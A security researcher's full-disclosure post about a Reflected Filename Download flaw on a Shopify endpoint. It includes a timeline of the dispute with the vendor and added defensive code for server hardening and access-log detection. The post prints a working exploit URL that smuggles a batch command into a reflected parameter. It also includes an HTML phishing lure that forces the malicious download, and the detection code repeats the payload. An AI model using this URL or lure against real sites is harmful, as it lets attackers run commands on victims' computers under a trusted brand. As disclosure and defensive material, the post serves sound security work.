David Sopas – Web Security Researcher

September 29, 2015 at 8:42 am

Shopify open to a RFD attack

Before Shopify had a bounty program on HackerOne, I had already sent (on 19 March) a security report about a Reflected Filename Download I found on their website.
It doesn't need any authentication such as an access_token or api_key, or even an account on Shopify.

The problem is located under app.shopify.com service.

On Internet Explorer 9 and 8, if you open the following link:

https://app.shopify.com/services/signup/track.bat?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F%22||start%20chrome%20davidsopas.com/poc/malware.htm||&_=

It shows a download dialog for a file named track.bat which, when executed, launches Google Chrome with a malicious webpage (in this case it's only text).
Of course a malicious user could run any operating system command he wishes.

On the latest versions of other browsers (Chrome, Opera, Firefox, Android Browser and Chrome for Android) the victim needs to visit a page that forces the download using the HTML5 <a download> attribute:

<div align="center">
<a href="https://app.shopify.com/services/signup/track.bat?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F%22||start%20chrome%20davidsopas.com/poc/malware.htm||&_=" download="track.bat">
<img src="http://harleyf.com/wp-content/uploads/2010/03/94_shopify.png" border="0" />
</a>
<h1>Shopify is giving away premium service!</h1>
<p><i>(Firefox users: Use "Save link as" to download the file)</i></p>
</div>

When the victim visits a specially crafted page with the code above and clicks the image, the download dialog appears, and after the download the browser shows that the file came from Shopify servers.

[Screenshot: shopify_chrome_rfd]

[Screenshot: shopify_opera_rfd]
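What a server-side handler for this endpoint should do instead can be shown in a few lines. The following is an added example, not code from the original post or from Shopify; the endpoint path, the callback and signup_page parameter names and the track.json filename are assumptions taken from the URL above. It applies three controls: the path must match exactly (so a trailing .bat is a 404, not an alias), every reflected parameter is validated before it reaches the body, and the response pins a fixed, harmless filename.

```python
"""Hardened JSONP-style tracking endpoint (added example, not Shopify's code).

Endpoint path, parameter names and filename are assumptions based on the
reported URL.
"""
import json
import re
from urllib.parse import urlsplit

# A callback may only be a plain (optionally dotted) JavaScript identifier.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")
# Characters a batch file or shell would read as quoting or command syntax.
META_RE = re.compile(r'[\s"\'|&;<>`^]')
ENDPOINT_PATH = "/services/signup/track"   # the only path the router serves
SAFE_FILENAME = "track.json"               # fixed name for any forced download


def valid_callback(name: str) -> bool:
    """True only for identifier-shaped callbacks of sane length."""
    return 0 < len(name) <= 64 and CALLBACK_RE.fullmatch(name) is not None


def valid_page_url(value: str) -> bool:
    """Accept only an http(s) URL with a host and no command metacharacters."""
    if not value or len(value) > 2048 or META_RE.search(value):
        return False
    parts = urlsplit(value)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def build_response(path: str, params: dict) -> dict:
    """Build {status, headers, body} for a request to the tracking endpoint."""
    # 1. Exact path match: "/services/signup/track.bat" is a 404, not an alias.
    if path != ENDPOINT_PATH:
        return {"status": 404, "headers": {}, "body": ""}

    callback = params.get("callback", "")
    page = params.get("signup_page", "")
    # 2. Reject anything that is not a clean identifier / clean URL.
    if not valid_callback(callback) or not valid_page_url(page):
        return {"status": 400, "headers": {"Content-Type": "text/plain"}, "body": "bad request"}

    # The URL is reflected only through the JSON encoder, never as raw text.
    payload = json.dumps({"ok": True, "signup_page": page})
    body = f"/**/{callback}({payload});"
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        # 3. nosniff stops content sniffing; the fixed filename means a saved
        #    response lands on disk as track.json.
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{SAFE_FILENAME}"',
    }
    return {"status": 200, "headers": headers, "body": body}


if __name__ == "__main__":
    # The report's payload (a quote, then "||start ...||") is refused outright.
    poc = 'http://www.shopify.com/"||start chrome davidsopas.com/poc/malware.htm||'
    print(build_response("/services/signup/track.bat", {"callback": "foobar", "signup_page": poc})["status"])
    print(build_response(ENDPOINT_PATH, {"callback": "foobar", "signup_page": poc})["status"])
    print(build_response(ENDPOINT_PATH, {"callback": "foobar", "signup_page": "http://www.shopify.com/"}))
```

The exact path match is the decisive control: once track.bat no longer resolves to the handler there is no executable filename for the browser to save. The parameter validation and the pinned Content-Disposition filename are defence in depth for the case where a router still tolerates extra suffixes. If signup_page genuinely has to carry a query string, the `&` character would need to be allowed in META_RE, which is why the other two controls matter.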

So a possible attack scenario would be:

  1. A malicious user sends the link to the victim, as with a CSRF or an XSS (phishing campaigns, social networks, instant messengers, posts, etc.)
  2. The victim clicks the link and, trusting where it came from (Shopify), downloads the file
  3. The victim runs the file and his computer is hijacked

To the victim, the entire process looks like a file being offered for download from Shopify's original site, and it would not raise any suspicion. A malicious user could gain complete control over a victim's computer and launch malicious files that appear to originate from a trusted party.
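For defenders, the request shape in this report is easy to pick out of web-server access logs. Below is an added example (not from the original post or from Shopify) that scans constructed Apache-style log lines for the two markers of this issue: an executable extension appended to a JSON/JSONP route, and a reflected parameter that decodes to batch command syntax. The /services/ prefix, the log format and the log lines themselves are assumptions made for the example.

```python
"""Access-log scan for RFD-looking requests (added example, not Shopify code).

Flags requests to API/JSONP paths (assumed prefix /services/) whose last path
segment carries an executable extension, and any query parameter that decodes
to batch/shell command syntax. The log lines are constructed for this example.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+'
)
API_PREFIXES = ("/services/",)                       # assumed JSON/JSONP routes
EXEC_EXT = {"bat", "cmd", "exe", "com", "ps1", "vbs", "hta", "scr", "sh"}
# Command separators or launcher words inside a decoded parameter value.
META_RE = re.compile(r"\|\||&&|\bstart\b|\bcmd\b|\bpowershell\b", re.IGNORECASE)

# Constructed sample log: one clean request, the reported request, one static file.
CONSTRUCTED_LOGS = """\
203.0.113.5 - - [29/Sep/2015:08:42:01 +0000] "GET /services/signup/track?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F HTTP/1.1" 200 83
203.0.113.6 - - [29/Sep/2015:08:42:02 +0000] "GET /services/signup/track.bat?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F%22||start%20chrome%20davidsopas.com/poc/malware.htm||&_= HTTP/1.1" 200 140
203.0.113.7 - - [29/Sep/2015:08:42:03 +0000] "GET /static/app.js HTTP/1.1" 200 5120
"""


def scan_line(line: str):
    """Return a finding dict for a suspicious request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    last = parts.path.rsplit("/", 1)[-1]
    ext = last.rsplit(".", 1)[-1].lower() if "." in last else ""
    reasons = []
    if parts.path.startswith(API_PREFIXES) and ext in EXEC_EXT:
        reasons.append(f"executable extension .{ext} on API path")
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; a second unquote catches double-encoded input.
        if META_RE.search(unquote(value)):
            reasons.append(f"command syntax in parameter {key!r}")
            break
    if not reasons:
        return None
    return {"ip": m.group("ip"), "path": parts.path, "reasons": reasons}


def scan_logs(text: str) -> list:
    """Scan every line of an access log and return all findings."""
    return [hit for hit in map(scan_line, text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan_logs(CONSTRUCTED_LOGS):
        print(hit["ip"], hit["path"], "; ".join(hit["reasons"]))
```

Either marker on its own is worth an alert on a JSONP route; both together on the same request, as in the second sample line, is the signature of this report. Because the server answered 200, a scan like this also tells you the route still tolerates the extension, which is the condition the fix has to remove.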

In my opinion this was the last time I’ll send anything to Shopify. We have different views on patching security reports.
An example: Some of the bounties that they already paid on HackerOne are Self-XSS and Missing SPF. Both issues were awarded with the minimum amount – $500. I don’t know where or why these issues are more dangerous than my security report but it’s up to them.
I was patient and gave them enough time to fix this issue – even sending them possible solutions. More than 6 months on a paid online store service and still unfixed seems too much.

So beware of this issue, because according to Shopify they don't foresee it being fixed any time soon.

Timeline:
19-03-2015 Reported this security issue to Shopify
27-03-2015 No reply, so I asked for an update
06-04-2015 First contact with Shopify, who replied that it was being processed
15-04-2015 Shopify told me that this security issue is interesting and asked for more information
15-04-2015 I sent more information and a new proof-of-concept
04-05-2015 I asked for an update (no reply)
15-06-2015 I asked for another update (no reply)
16-09-2015 I asked for another update
22-09-2015 After no email from Shopify since April, they replied that they were working on fixing more urgent issues and considered mine low impact and low priority
23-09-2015 I told them that it's not a social engineering issue, but they still don't understand it
23-09-2015 Shopify told me that their prioritization is not up for discussion and that they are not patching any time soon
25-09-2015 Full disclosure
